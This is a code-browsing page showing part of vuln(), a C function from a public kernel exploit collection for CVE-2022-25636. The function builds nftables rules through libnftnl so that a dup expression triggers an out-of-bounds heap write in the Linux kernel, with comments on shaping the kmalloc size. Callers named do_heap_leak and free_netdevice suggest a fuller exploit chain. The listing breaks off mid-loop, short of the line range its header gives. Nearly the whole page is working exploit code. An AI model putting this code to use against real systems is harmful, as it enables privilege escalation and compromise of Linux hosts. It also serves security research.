MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / vuln

Function vuln

CVE-2022-25636/exploit/exploit.c:112–216  ·  view source on GitHub ↗

vuln() —— trigger OOB write (legit_writes - # of legit rules; oob_writes - # of OOB rules)

Source from the content-addressed store, hash-verified

110}
111// vuln() —— trigger OOB write (legit_writes - # of legit rules; oob_writes - # of OOB rules)
112void vuln(int oob_writes, int legit_writes) {
113 // setup table
114 struct nftnl_table *table = nftnl_table_alloc();
115 nftnl_table_set_str(table, NFTNL_TABLE_NAME, "x"); // table x
116 nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);
117
118 // chain
119 struct nftnl_chain *chain = nftnl_chain_alloc();
120 nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, "x");
121 nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, "y"); // chain y
122 nftnl_chain_set_u32(chain, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
123 nftnl_chain_set_u32(chain, NFTNL_CHAIN_PRIO, 10);
124 nftnl_chain_set_str(chain, NFTNL_CHAIN_DEV, "lo");
125 nftnl_chain_set_str(chain, NFTNL_CHAIN_TYPE, "filter");
126 //rule
127 struct nftnl_rule *rule = nftnl_rule_alloc();
128 nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, "x");
129 nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "y");
130 // expression
131 struct nftnl_expr *exprs[128];
132 int exprid = 0;
133
134 exprs[exprid] = nftnl_expr_alloc("meta");
135 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_META_KEY, NFT_META_PROTOCOL);
136 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_META_DREG, NFT_REG_1);
137 nftnl_rule_add_expr(rule, exprs[exprid]);
138 exprid++;
139
140 exprs[exprid] = nftnl_expr_alloc("cmp");
141 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_SREG, NFT_REG_1);
142 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
143 nftnl_expr_set_u16(exprs[exprid], NFTNL_EXPR_CMP_DATA, 8);
144 nftnl_rule_add_expr(rule, exprs[exprid]);
145 exprid++;
146
147 exprs[exprid] = nftnl_expr_alloc("payload");
148 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_BASE, NFT_PAYLOAD_NETWORK_HEADER);
149 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_OFFSET, 16);
150 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_LEN, 4);
151 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_PAYLOAD_DREG, NFT_REG_1);
152 nftnl_rule_add_expr(rule, exprs[exprid]);
153 exprid++;
154
155 exprs[exprid] = nftnl_expr_alloc("cmp");
156 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_SREG, NFT_REG_1);
157 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_OP, NFT_CMP_EQ);
158 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_CMP_DATA, 0x0200007f);
159 nftnl_rule_add_expr(rule, exprs[exprid]);
160 exprid++;
161
162// # of legit rules - control the targeted kmalloc size
163 for (int i = 0; i < legit_writes; i++) {
164 exprs[exprid] = nftnl_expr_alloc("immediate");
165 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DREG, NFT_REG_1);
166 nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DATA, 1);
167 nftnl_rule_add_expr(rule, exprs[exprid]);
168 exprid++;
169 exprs[exprid] = nftnl_expr_alloc("dup");

Callers 2

do_heap_leakFunction · 0.85
free_netdeviceFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected